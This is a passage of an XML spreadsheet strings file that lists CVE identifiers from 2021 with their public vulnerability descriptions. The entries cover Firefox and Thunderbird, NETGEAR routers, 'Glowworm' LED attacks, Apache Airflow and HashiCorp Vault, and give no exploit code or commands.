    <t>When delegating navigations to the operating system, Firefox would accept the `mk` scheme which might allow attackers to launch pages and execute scripts in Internet Explorer in unprivileged mode. *This bug only affects Firefox for Windows. Other operating systems are unaffected.*. This vulnerability affects Firefox &lt; 92, Thunderbird &lt; 91.1, Thunderbird &lt; 78.14, Firefox ESR &lt; 78.14, and Firefox ESR &lt; 91.1.</t>
  </si>
  <si>
    <t>CVE-2021-38493</t>
  </si>
  <si>
    <t>Mozilla developers reported memory safety bugs present in Firefox 91 and Firefox ESR 78.13. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox ESR &lt; 78.14, Thunderbird &lt; 78.14, and Firefox &lt; 92.</t>
  </si>
  <si>
    <t>CVE-2021-38494</t>
  </si>
  <si>
    <t>Mozilla developers reported memory safety bugs present in Firefox 91. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox &lt; 92.</t>
  </si>
  <si>
    <t>CVE-2021-38495</t>
  </si>
  <si>
    <t>Mozilla developers reported memory safety bugs present in Thunderbird 78.13.0. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Thunderbird &lt; 91.1 and Firefox ESR &lt; 91.1.</t>
  </si>
  <si>
    <t>CVE-2021-38496</t>
  </si>
  <si>
    <t>During operations on MessageTasks, a task may have been removed while it was still scheduled, resulting in memory corruption and a potentially exploitable crash. This vulnerability affects Thunderbird &lt; 78.15, Thunderbird &lt; 91.2, Firefox ESR &lt; 91.2, Firefox ESR &lt; 78.15, and Firefox &lt; 93.</t>
  </si>
  <si>
    <t>CVE-2021-38497</t>
  </si>
  <si>
    <t>Through use of reportValidity() and window.open(), a plain-text validation message could have been overlaid on another origin, leading to possible user confusion and spoofing attacks. This vulnerability affects Firefox &lt; 93, Thunderbird &lt; 91.2, and Firefox ESR &lt; 91.2.</t>
  </si>
  <si>
    <t>CVE-2021-38498</t>
  </si>
  <si>
    <t>During process shutdown, a document could have caused a use-after-free of a languages service object, leading to memory corruption and a potentially exploitable crash. This vulnerability affects Firefox &lt; 93, Thunderbird &lt; 91.2, and Firefox ESR &lt; 91.2.</t>
  </si>
  <si>
    <t>CVE-2021-38499</t>
  </si>
  <si>
    <t>Mozilla developers reported memory safety bugs present in Firefox 92. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox &lt; 93.</t>
  </si>
  <si>
    <t>CVE-2021-3850</t>
  </si>
  <si>
    <t>Authentication Bypass by Primary Weakness in GitHub repository adodb/adodb prior to 5.20.21.</t>
  </si>
  <si>
    <t>CVE-2021-38500</t>
  </si>
  <si>
    <t>Mozilla developers reported memory safety bugs present in Firefox 92 and Firefox ESR 91.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Thunderbird &lt; 78.15, Thunderbird &lt; 91.2, Firefox ESR &lt; 91.2, Firefox ESR &lt; 78.15, and Firefox &lt; 93.</t>
  </si>
  <si>
    <t>CVE-2021-38501</t>
  </si>
  <si>
    <t>Mozilla developers reported memory safety bugs present in Firefox 92 and Firefox ESR 91.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox &lt; 93, Thunderbird &lt; 91.2, and Firefox ESR &lt; 91.2.</t>
  </si>
  <si>
    <t>CVE-2021-38502</t>
  </si>
  <si>
    <t>Thunderbird ignored the configuration to require STARTTLS security for an SMTP connection. A MITM could perform a downgrade attack to intercept transmitted messages, or could take control of the authenticated session to execute SMTP commands chosen by the MITM. If an unprotected authentication method was configured, the MITM could obtain the authentication credentials, too. This vulnerability affects Thunderbird &lt; 91.2.</t>
  </si>
  <si>
    <t>CVE-2021-38503</t>
  </si>
  <si>
    <t>The iframe sandbox rules were not correctly applied to XSLT stylesheets, allowing an iframe to bypass restrictions such as executing scripts or navigating the top-level frame. This vulnerability affects Firefox &lt; 94, Thunderbird &lt; 91.3, and Firefox ESR &lt; 91.3.</t>
  </si>
  <si>
    <t>CVE-2021-38504</t>
  </si>
  <si>
    <t>When interacting with an HTML input element's file picker dialog with webkitdirectory set, a use-after-free could have resulted, leading to memory corruption and a potentially exploitable crash. This vulnerability affects Firefox &lt; 94, Thunderbird &lt; 91.3, and Firefox ESR &lt; 91.3.</t>
  </si>
  <si>
    <t>CVE-2021-38505</t>
  </si>
  <si>
    <t>Microsoft introduced a new feature in Windows 10 known as Cloud Clipboard which, if enabled, will record data copied to the clipboard to the cloud, and make it available on other computers in certain scenarios. Applications that wish to prevent copied data from being recorded in Cloud History must use specific clipboard formats; and Firefox before versions 94 and ESR 91.3 did not implement them. This could have caused sensitive data to be recorded to a user's Microsoft account. *This bug only affects Firefox for Windows 10+ with Cloud Clipboard enabled. Other operating systems are unaffected.*. This vulnerability affects Firefox &lt; 94, Thunderbird &lt; 91.3, and Firefox ESR &lt; 91.3.</t>
  </si>
  <si>
    <t>CVE-2021-38506</t>
  </si>
  <si>
    <t>Through a series of navigations, Firefox could have entered fullscreen mode without notification or warning to the user. This could lead to spoofing attacks on the browser UI including phishing. This vulnerability affects Firefox &lt; 94, Thunderbird &lt; 91.3, and Firefox ESR &lt; 91.3.</t>
  </si>
  <si>
    <t>CVE-2021-38507</t>
  </si>
  <si>
    <t>The Opportunistic Encryption feature of HTTP2 (RFC 8164) allows a connection to be transparently upgraded to TLS while retaining the visual properties of an HTTP connection, including being same-origin with unencrypted connections on port 80. However, if a second encrypted port on the same IP address (e.g. port 8443) did not opt-in to opportunistic encryption; a network attacker could forward a connection from the browser to port 443 to port 8443, causing the browser to treat the content of port 8443 as same-origin with HTTP. This was resolved by disabling the Opportunistic Encryption feature, which had low usage. This vulnerability affects Firefox &lt; 94, Thunderbird &lt; 91.3, and Firefox ESR &lt; 91.3.</t>
  </si>
  <si>
    <t>CVE-2021-38508</t>
  </si>
  <si>
    <t>By displaying a form validity message in the correct location at the same time as a permission prompt (such as for geolocation), the validity message could have obscured the prompt, resulting in the user potentially being tricked into granting the permission. This vulnerability affects Firefox &lt; 94, Thunderbird &lt; 91.3, and Firefox ESR &lt; 91.3.</t>
  </si>
  <si>
    <t>CVE-2021-38509</t>
  </si>
  <si>
    <t>Due to an unusual sequence of attacker-controlled events, a Javascript alert() dialog with arbitrary (although unstyled) contents could be displayed over top an uncontrolled webpage of the attacker's choosing. This vulnerability affects Firefox &lt; 94, Thunderbird &lt; 91.3, and Firefox ESR &lt; 91.3.</t>
  </si>
  <si>
    <t>CVE-2021-3851</t>
  </si>
  <si>
    <t>firefly-iii is vulnerable to URL Redirection to Untrusted Site</t>
  </si>
  <si>
    <t>CVE-2021-38510</t>
  </si>
  <si>
    <t>The executable file warning was not presented when downloading .inetloc files, which, due to a flaw in Mac OS, can run commands on a user's computer.*Note: This issue only affected Mac OS operating systems. Other operating systems are unaffected.*. This vulnerability affects Firefox &lt; 94, Thunderbird &lt; 91.3, and Firefox ESR &lt; 91.3.</t>
  </si>
  <si>
    <t>CVE-2021-38511</t>
  </si>
  <si>
    <t>An issue was discovered in the tar crate before 0.4.36 for Rust. When symlinks are present in a TAR archive, extraction can create arbitrary directories via .. traversal.</t>
  </si>
  <si>
    <t>CVE-2021-38512</t>
  </si>
  <si>
    <t>An issue was discovered in the actix-http crate before 3.0.0-beta.9 for Rust. HTTP/1 request smuggling (aka HRS) can occur, potentially leading to credential disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-38513</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by authentication bypass. This affects RBK852 before 3.2.10.11, RBR850 before 3.2.10.11, RBS850 before 3.2.10.11, CBR40 before 2.5.0.10, EAX20 before 1.0.0.48, MK62 before 1.0.6.110, MR60 before 1.0.6.110, MS60 before 1.0.6.110, RBK752 before 3.2.10.10, RBR750 before 3.2.10.10, and RBS750 before 3.2.10.10.</t>
  </si>
  <si>
    <t>CVE-2021-38514</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by authentication bypass. This affects D3600 before 1.0.0.72, D6000 before 1.0.0.72, D6100 before 1.0.0.63, D6200 before 1.1.00.34, D6220 before 1.0.0.48, D6400 before 1.0.0.86, D7000 before 1.0.1.70, D7000v2 before 1.0.0.52, D7800 before 1.0.1.56, D8500 before 1.0.3.44, DC112A before 1.0.0.42, DGN2200v4 before 1.0.0.108, DGND2200Bv4 before 1.0.0.108, EX2700 before 1.0.1.48, EX3700 before 1.0.0.76, EX3800 before 1.0.0.76, EX6000 before 1.0.0.38, EX6100 before 1.0.2.24, EX6100v2 before 1.0.1.76, EX6120 before 1.0.0.42, EX6130 before 1.0.0.28, EX6150v1 before 1.0.0.42, EX6150v2 before 1.0.1.76, EX6200 before 1.0.3.88, EX6200v2 before 1.0.1.72, EX6400 before 1.0.2.136, EX7000 before 1.0.0.66, EX7300 before 1.0.2.136, EX8000 before 1.0.1.180, RBK50 before 2.1.4.10, RBR50 before 2.1.4.10, RBS50 before 2.1.4.10, RBK40 before 2.1.4.10, RBR40 before 2.1.4.10, RBS40 before 2.1.4.10, RBW30 before 2.2.1.204, PR2000 before 1.0.0.28, R6020 before 1.0.0.38, R6080 before 1.0.0.38, R6050 before 1.0.1.18, JR6150 before 1.0.1.18, R6120 before 1.0.0.46, R6220 before 1.1.0.86, R6250 before 1.0.4.34, R6300v2 before 1.0.4.32, R6400 before 1.0.1.44, R6400v2 before 1.0.2.62, R6700 before 1.0.1.48, R6700v2 before 1.2.0.36, R6800 before 1.2.0.36, R6900v2 before 1.2.0.36, R6900 before 1.0.1.48, R7000 before 1.0.9.34, R6900P before 1.3.1.64, R7000P before 1.3.1.64, R7100LG before 1.0.0.48, R7300DST before 1.0.0.70, R7500v2 before 1.0.3.38, R7800 before 1.0.2.52, R7900 before 1.0.3.8, R8000 before 1.0.4.28, R7900P before 1.4.1.30, R8000P before 1.4.1.30, R8300 before 1.0.2.128, R8500 before 1.0.2.128, R9000 before 1.0.3.10, RBS40V before 2.2.0.58, RBK50V before 2.2.0.58, WN2000RPTv3 before 1.0.1.32, WN2500RPv2 before 1.0.1.54, WN3000RPv3 before 1.0.2.78, WN3100RPv2 before 1.0.0.66, WNDR3400v3 before 1.0.1.22, WNDR3700v4 before 1.0.2.102, WNDR4300v1 before 1.0.2.104, WNDR4300v2 before 1.0.0.56, WNDR4500v3 before 1.0.0.56, WNR2000v5 (R2000) before 1.0.0.66, WNR2020 before 1.1.0.62, WNR2050 before 1.1.0.62, WNR3500Lv2 before 1.2.0.62, and XR500 before 2.3.2.22.</t>
  </si>
  <si>
    <t>CVE-2021-38515</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by denial of service. This affects R6400v2 before 1.0.4.98, R6700v3 before 1.0.4.98, R7900 before 1.0.3.18, and R8000 before 1.0.4.46.</t>
  </si>
  <si>
    <t>CVE-2021-38516</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by lack of access control at the function level. This affects D6220 before 1.0.0.48, D6400 before 1.0.0.82, D7000v2 before 1.0.0.52, D7800 before 1.0.1.44, D8500 before 1.0.3.43, DC112A before 1.0.0.40, DGN2200v4 before 1.0.0.108, RBK50 before 2.3.0.32, RBR50 before 2.3.0.32, RBS50 before 2.3.0.32, RBK20 before 2.3.0.28, RBR20 before 2.3.0.28, RBS20 before 2.3.0.28, RBK40 before 2.3.0.28, RBR40 before 2.3.0.28, RBS40 before 2.3.0.28, R6020 before 1.0.0.34, R6080 before 1.0.0.34, R6120 before 1.0.0.44, R6220 before 1.1.0.80, R6230 before 1.1.0.80, R6250 before 1.0.4.34, R6260 before 1.1.0.40, R6850 before 1.1.0.40, R6350 before 1.1.0.40, R6400v2 before 1.0.2.62, R6700v3 before 1.0.2.62, R6700v2 before 1.2.0.36, R6800 before 1.2.0.36, R6900v2 before 1.2.0.36, R7000 before 1.0.9.34, R6900P before 1.3.1.44, R7000P before 1.3.1.44, R7100LG before 1.0.0.48, R7200 before 1.2.0.48, R7350 before 1.2.0.48, R7400 before 1.2.0.48, R7450 before 1.2.0.36, AC2100 before 1.2.0.36, AC2400 before 1.2.0.36, AC2600 before 1.2.0.36, R7500v2 before 1.0.3.38, R7800 before 1.0.2.58, R7900 before 1.0.3.8, R7960P before 1.4.1.44, R8000 before 1.0.4.28, R7900P before 1.4.1.30, R8000P before 1.4.1.30, R8900 before 1.0.4.2, R9000 before 1.0.4.2, RAX120 before 1.0.0.74, RBK752 before 3.2.16.6, RBR750 before 3.2.16.6, RBS750 before 3.2.16.6, RBK852 before 3.2.16.6, RBR850 before 3.2.16.6, RBS850 before 3.2.16.6, WNR3500Lv2 before 1.2.0.56, XR450 before 2.3.2.32, and XR500 before 2.3.2.32.</t>
  </si>
  <si>
    <t>CVE-2021-38517</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by out-of-bounds reads and writes. This affects R6400 before 1.0.1.70, RAX75 before 1.0.4.120, RAX80 before 1.0.4.120, and XR300 before 1.0.3.50.</t>
  </si>
  <si>
    <t>CVE-2021-38518</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by command injection by an authenticated user. This affects RAX200 before 1.0.4.120, RAX75 before 1.0.4.120, RAX80 before 1.0.4.120, RBK852 before 3.2.17.12, RBR850 before 3.2.17.12, and RBS850 before 3.2.17.12.</t>
  </si>
  <si>
    <t>CVE-2021-38519</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by command injection by an authenticated user. This affects R6250 before 1.0.4.36, R6300v2 before 1.0.4.36, R6400 before 1.0.1.50, R6400v2 before 1.0.2.66, R6700v3 before 1.0.2.66, R6700 before 1.0.2.8, R6900 before 1.0.2.8, R7000 before 1.0.9.88, R6900P before 1.3.2.132, R7100LG before 1.0.0.52, R7900 before 1.0.3.10, R8000 before 1.0.4.46, R7900P before 1.4.1.50, R8000P before 1.4.1.50, and RAX80 before 1.0.1.40.</t>
  </si>
  <si>
    <t>CVE-2021-3852</t>
  </si>
  <si>
    <t>growi is vulnerable to Authorization Bypass Through User-Controlled Key</t>
  </si>
  <si>
    <t>CVE-2021-38520</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by command injection by an authenticated user. This affects R6400 before 1.0.1.52, R6400v2 before 1.0.4.84, R6700v3 before 1.0.4.84, R6700v2 before 1.2.0.62, R6900v2 before 1.2.0.62, and R7000P before 1.3.2.124.</t>
  </si>
  <si>
    <t>CVE-2021-38521</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by command injection by an authenticated user. This affects R6400 before 1.0.1.50, R7900P before 1.4.1.50, R8000P before 1.4.1.50, RAX75 before 1.0.1.62, and RAX80 before 1.0.1.62.</t>
  </si>
  <si>
    <t>CVE-2021-38522</t>
  </si>
  <si>
    <t>NETGEAR R6400 devices before 1.0.1.52 are affected by a stack-based buffer overflow by an authenticated user.</t>
  </si>
  <si>
    <t>CVE-2021-38523</t>
  </si>
  <si>
    <t>NETGEAR R6400 devices before 1.0.1.70 are affected by a stack-based buffer overflow by an authenticated user.</t>
  </si>
  <si>
    <t>CVE-2021-38524</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects MK62 before 1.0.6.110, MR60 before 1.0.6.110, MS60 before 1.0.6.110, RAX15 before 1.0.2.82, RAX20 before 1.0.2.82, RAX200 before 1.0.3.106, RAX45 before 1.0.2.32, RAX50 before 1.0.2.32, RAX75 before 1.0.3.106, RAX80 before 1.0.3.106, RBK752 before 3.2.16.6, RBR750 before 3.2.16.6, and RBS750 before 3.2.16.6.</t>
  </si>
  <si>
    <t>CVE-2021-38525</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects D3600 before 1.0.0.76, D6000 before 1.0.0.76, D6200 before 1.1.00.36, D7000 before 1.0.1.70, EX6200v2 before 1.0.1.78, EX7000 before 1.0.1.78, EX8000 before 1.0.1.186, JR6150 before 1.0.1.18, PR2000 before 1.0.0.28, R6020 before 1.0.0.42, R6050 before 1.0.1.18, R6080 before 1.0.0.42, R6120 before 1.0.0.46, R6220 before 1.1.0.80, R6260 before 1.1.0.64, R6300v2 before 1.0.4.34, R6700 before 1.0.2.6, R6700v2 before 1.2.0.36, R6800 before 1.2.0.36, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R6900v2 before 1.2.0.36, R7000 before 1.0.9.42, R7000P before 1.3.1.64, R7800 before 1.0.2.60, R8900 before 1.0.4.12, R9000 before 1.0.4.12, and XR500 before 2.3.2.40.</t>
  </si>
  <si>
    <t>CVE-2021-38526</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by a buffer overflow by an unauthenticated attacker. This affects RAX35 before 1.0.3.94, RAX38 before 1.0.3.94, and RAX40 before 1.0.3.94.</t>
  </si>
  <si>
    <t>CVE-2021-38527</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects CBR40 before 2.5.0.14, EX6100v2 before 1.0.1.98, EX6150v2 before 1.0.1.98, EX6250 before 1.0.0.132, EX6400 before 1.0.2.158, EX6400v2 before 1.0.0.132, EX6410 before 1.0.0.132, EX6420 before 1.0.0.132, EX7300 before 1.0.2.158, EX7300v2 before 1.0.0.132, EX7320 before 1.0.0.132, EX7700 before 1.0.0.216, EX8000 before 1.0.1.232, R7800 before 1.0.2.78, RBK12 before 2.6.1.44, RBR10 before 2.6.1.44, RBS10 before 2.6.1.44, RBK20 before 2.6.1.38, RBR20 before 2.6.1.36, RBS20 before 2.6.1.38, RBK40 before 2.6.1.38, RBR40 before 2.6.1.36, RBS40 before 2.6.1.38, RBK50 before 2.6.1.40, RBR50 before 2.6.1.40, RBS50 before 2.6.1.40, RBK752 before 3.2.16.6, RBR750 before 3.2.16.6, RBS750 before 3.2.16.6, RBK852 before 3.2.16.6, RBR850 before 3.2.16.6, RBS850 before 3.2.16.6, RBS40V before 2.6.2.4, RBS50Y before 2.6.1.40, RBW30 before 2.6.2.2, and XR500 before 2.3.2.114.</t>
  </si>
  <si>
    <t>CVE-2021-38528</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects D8500 before 1.0.3.58, R6900P before 1.3.2.132, R7000P before 1.3.2.132, R7100LG before 1.0.0.64, WNDR3400v3 before 1.0.1.38, and XR300 before 1.0.3.56.</t>
  </si>
  <si>
    <t>CVE-2021-38529</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects D7800 before 1.0.1.56, R7800 before 1.0.2.68, R8900 before 1.0.4.26, and R9000 before 1.0.4.26.</t>
  </si>
  <si>
    <t>CVE-2021-3853</t>
  </si>
  <si>
    <t>chaskiq is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</t>
  </si>
  <si>
    <t>CVE-2021-38530</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects RBK40 before 2.5.1.16, RBR40 before 2.5.1.16, RBS40 before 2.5.1.16, RBK20 before 2.5.1.16, RBR20 before 2.5.1.16, RBS20 before 2.5.1.16, RBK50 before 2.5.1.16, RBR50 before 2.5.1.16, RBS50 before 2.5.1.16, and RBS50Y before 2.6.1.40.</t>
  </si>
  <si>
    <t>CVE-2021-38531</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects D6200 before 1.1.00.40, D7000 before 1.0.1.78, R6020 before 1.0.0.42, R6080 before 1.0.0.42, R6120 before 1.0.0.66, R6260 before 1.1.0.78, R6700v2 before 1.2.0.76, R6800 before 1.2.0.76, R6900v2 before 1.2.0.76, R7450 before 1.2.0.76, AC2100 before 1.2.0.76, and AC2400 before 1.2.0.76.</t>
  </si>
  <si>
    <t>CVE-2021-38532</t>
  </si>
  <si>
    <t>NETGEAR WAC104 devices before 1.0.4.15 are affected by incorrect configuration of security settings.</t>
  </si>
  <si>
    <t>CVE-2021-38533</t>
  </si>
  <si>
    <t>NETGEAR RAX40 devices before 1.0.3.64 are affected by stored XSS.</t>
  </si>
  <si>
    <t>CVE-2021-38534</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by stored XSS. This affects D3600 before 1.0.0.76, D6000 before 1.0.0.76, D6100 before 1.0.0.60, D6200 before 1.1.00.36, D6220 before 1.0.0.52, D6400 before 1.0.0.86, D7000 before 1.0.1.70, D7000v2 before 1.0.0.53, D8500 before 1.0.3.44, DC112A before 1.0.0.42, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.109, DM200 before 1.0.0.61, JR6150 before 1.0.1.18, PR2000 before 1.0.0.28, R6020 before 1.0.0.42, R6050 before 1.0.1.18, R6080 before 1.0.0.42, R6220 before 1.1.0.80, R6230 before 1.1.0.80, R6250 before 1.0.4.34, R6260 before 1.1.0.64, R6300v2 before 1.0.4.34, R6400 before 1.0.1.46, R6400v2 before 1.0.2.62, R6700 before 1.0.2.6, R6700v2 before 1.2.0.36, R6700v3 before 1.0.2.62, R6800 before 1.2.0.36, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R6900v2 before 1.2.0.36, R7000 before 1.0.9.60, R7000P before 1.3.1.64, R7100LG before 1.0.0.50, R7300DST before 1.0.0.70, R7450 before 1.2.0.36, R7900 before 1.0.3.8, R7900P before 1.4.1.50, R8000 before 1.0.4.28, R8000P before 1.4.1.50, R8300 before 1.0.2.130, R8500 before 1.0.2.130, WNDR3400v3 before 1.0.1.24, WNR2020 before 1.1.0.62, WNR3500Lv2 before 1.2.0.62, XR450 before 2.3.2.40, and XR500 before 2.3.2.40.</t>
  </si>
  <si>
    <t>CVE-2021-38535</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by stored XSS. This affects D6200 before 1.1.00.40, D7000 before 1.0.1.78, R6020 before 1.0.0.48, R6080 before 1.0.0.48, R6120 before 1.0.0.76, R6260 before 1.1.0.78, R6700v2 before 1.2.0.76, R6800 before 1.2.0.76, R6900v2 before 1.2.0.76, R6850 before 1.1.0.78, R7200 before 1.2.0.76, R7350 before 1.2.0.76, R7400 before 1.2.0.76, R7450 before 1.2.0.76, AC2100 before 1.2.0.76, AC2400 before 1.2.0.76, AC2600 before 1.2.0.76, RAX35 before 1.0.3.62, and RAX40 before 1.0.3.62.</t>
  </si>
  <si>
    <t>CVE-2021-38536</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by stored XSS. This affects D6200 before 1.1.00.40, D7000 before 1.0.1.78, R6020 before 1.0.0.48, R6080 before 1.0.0.48, R6120 before 1.0.0.66, R6260 before 1.1.0.78, R6700v2 before 1.2.0.76, R6800 before 1.2.0.76, R6900v2 before 1.2.0.76, R6850 before 1.1.0.78, R7200 before 1.2.0.76, R7350 before 1.2.0.76, R7400 before 1.2.0.76, R7450 before 1.2.0.76, AC2100 before 1.2.0.76, AC2400 before 1.2.0.76, AC2600 before 1.2.0.76, RAX35 before 1.0.3.62, and RAX40 before 1.0.3.62.</t>
  </si>
  <si>
    <t>CVE-2021-38537</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by stored XSS. This affects D6200 before 1.1.00.40, D7000 before 1.0.1.78, R6020 before 1.0.0.48, R6080 before 1.0.0.48, R6120 before 1.0.0.66, R6260 before 1.1.0.78, R6700v2 before 1.2.0.76, R6800 before 1.2.0.76, R6900v2 before 1.2.0.76, R6850 before 1.1.0.78, R7200 before 1.2.0.76, R7350 before 1.2.0.76, R7400 before 1.2.0.76, R7450 before 1.2.0.76, AC2100 before 1.2.0.76, AC2400 before 1.2.0.76, AC2600 before 1.2.0.76, and RAX40 before 1.0.3.62.</t>
  </si>
  <si>
    <t>CVE-2021-38538</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by stored XSS. This affects D7800 before 1.0.1.56, R7800 before 1.0.2.68, R8900 before 1.0.4.26, R9000 before 1.0.4.26, RAX120 before 1.0.0.78, RBK20 before 2.3.5.26, RBR20 before 2.3.5.26, RBS20 before 2.3.5.26, RBK40 before 2.3.5.30, RBR40 before 2.3.5.30, RBS40 before 2.3.5.30, RBK50 before 2.3.5.30, RBR50 before 2.3.5.30, RBS50 before 2.3.5.30, and XR500 before 2.3.2.56.</t>
  </si>
  <si>
    <t>CVE-2021-38539</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by privilege escalation. This affects D8500 before 1.0.3.44, R6400v2 before 1.0.2.66, R6700 before 1.0.2.6, R6700v3 before 1.0.2.66, R6900 before 1.0.2.4, R6900P before 1.3.2.126, R7000 before 1.0.9.42, R7000P before 1.3.2.126, R7100LG before 1.0.0.50, R7300DST before 1.0.0.70, R7900 before 1.0.3.10, R8300 before 1.0.2.130, and R8500 before 1.0.2.130.</t>
  </si>
  <si>
    <t>CVE-2021-38540</t>
  </si>
  <si>
    <t>The variable import endpoint was not protected by authentication in Airflow &gt;=2.0.0, &lt;2.1.3. This allowed unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs, potentially resulting in a denial of service, information disclosure or remote code execution. This issue affects Apache Airflow &gt;=2.0.0, &lt;2.1.3.</t>
  </si>
  <si>
    <t>CVE-2021-38542</t>
  </si>
  <si>
    <t>Apache James prior to release 3.6.1 is vulnerable to a buffering attack relying on the use of the STARTTLS command. This can result in Man-in -the-middle command injection attacks, leading potentially to leakage of sensible information.</t>
  </si>
  <si>
    <t>CVE-2021-38543</t>
  </si>
  <si>
    <t>TP-Link UE330 USB splitter devices through 2021-08-09, in certain specific use cases in which the device supplies power to audio-output equipment, allow remote attackers to recover speech signals from an LED on the device, via a telescope and an electro-optical sensor, aka a "Glowworm" attack. We assume that the USB splitter supplies power to some speakers. The power indicator LED of the USB splitter is connected directly to the power line, as a result, the intensity of the USB splitter's power indicator LED is correlative to its power consumption. The sound played by the connected speakers affects the USB splitter's power consumption and as a result is also correlative to the light intensity of the LED. By analyzing measurements obtained from an electro-optical sensor directed at the power indicator LED of the USB splitter, we can recover the sound played by the connected speakers.</t>
  </si>
  <si>
    <t>CVE-2021-38544</t>
  </si>
  <si>
    <t>Sony SRS-XB33 and SRS-XB43 devices through 2021-08-09 allow remote attackers to recover speech signals from an LED on the device, via a telescope and an electro-optical sensor, aka a "Glowworm" attack. The power indicator LED of the speakers is connected directly to the power line, as a result, the intensity of a device's power indicator LED is correlative to the power consumption. The sound played by the speakers affects their power consumption and as a result is also correlative to the light intensity of the LEDs. By analyzing measurements obtained from an electro-optical sensor directed at the power indicator LEDs of the speakers, we can recover the sound played by them.</t>
  </si>
  <si>
    <t>CVE-2021-38545</t>
  </si>
  <si>
    <t>Raspberry Pi 3 B+ and 4 B devices through 2021-08-09, in certain specific use cases in which the device supplies power to audio-output equipment, allow remote attackers to recover speech signals from an LED on the device, via a telescope and an electro-optical sensor, aka a "Glowworm" attack. We assume that the Raspberry Pi supplies power to some speakers. The power indicator LED of the Raspberry Pi is connected directly to the power line, as a result, the intensity of a device's power indicator LED is correlative to the power consumption. The sound played by the speakers affects the Raspberry Pi's power consumption and as a result is also correlative to the light intensity of the LED. By analyzing measurements obtained from an electro-optical sensor directed at the power indicator LED of the Raspberry Pi, we can recover the sound played by the speakers.</t>
  </si>
  <si>
    <t>CVE-2021-38546</t>
  </si>
  <si>
    <t>CREATIVE Pebble devices through 2021-08-09 allow remote attackers to recover speech signals from an LED on the device, via a telescope and an electro-optical sensor, aka a "Glowworm" attack. The power indicator LED of the speakers is connected directly to the power line, as a result, the intensity of a device's power indicator LED is correlative to the power consumption. The sound played by the speakers affects their power consumption and as a result is also correlative to the light intensity of the LEDs. By analyzing measurements obtained from an electro-optical sensor directed at the power indicator LEDs of the speakers, we can recover the sound played by them.</t>
  </si>
  <si>
    <t>CVE-2021-38547</t>
  </si>
  <si>
    <t>Logitech Z120 and S120 speakers through 2021-08-09 allow remote attackers to recover speech signals from an LED on the device, via a telescope and an electro-optical sensor, aka a "Glowworm" attack. The power indicator LED of the speakers is connected directly to the power line, as a result, the intensity of a device's power indicator LED is correlative to the power consumption. The sound played by the speakers affects their power consumption and as a result is also correlative to the light intensity of the LEDs. By analyzing measurements obtained from an electro-optical sensor directed at the power indicator LEDs of the speakers, we can recover the sound played by them.</t>
  </si>
  <si>
    <t>CVE-2021-38548</t>
  </si>
  <si>
    <t>JBL Go 2 devices through 2021-08-09 allow remote attackers to recover speech signals from an LED on the device, via a telescope and an electro-optical sensor, aka a "Glowworm" attack. The power indicator LED of the speakers is connected directly to the power line, as a result, the intensity of a device's power indicator LED is correlative to the power consumption. The sound played by the speakers affects their power consumption and as a result is also correlative to the light intensity of the LEDs. By analyzing measurements obtained from an electro-optical sensor directed at the power indicator LEDs of the speakers, we can recover the sound played by them.</t>
  </si>
  <si>
    <t>CVE-2021-38549</t>
  </si>
  <si>
    <t>MIRACASE MHUB500 USB splitters through 2021-08-09, in certain specific use cases in which the device supplies power to audio-output equipment, allow remote attackers to recover speech signals from an LED on the device, via a telescope and an electro-optical sensor, aka a "Glowworm" attack. We assume that the USB splitter supplies power to some speakers. The power indicator LED of the USB splitter is connected directly to the power line, as a result, the intensity of the USB splitter's power indicator LED is correlative to its power consumption. The sound played by the connected speakers affects the USB splitter's power consumption and as a result is also correlative to the light intensity of the LED. By analyzing measurements obtained from an electro-optical sensor directed at the power indicator LED of the USB splitter, we can recover the sound played by the connected speakers.</t>
  </si>
  <si>
    <t>CVE-2021-38553</t>
  </si>
  <si>
    <t>HashiCorp Vault and Vault Enterprise 1.4.0 through 1.7.3 initialized an underlying database file associated with the Integrated Storage feature with excessively broad filesystem permissions. Fixed in Vault and Vault Enterprise 1.8.0.</t>
  </si>
  <si>
    <t>CVE-2021-38554</t>
  </si>
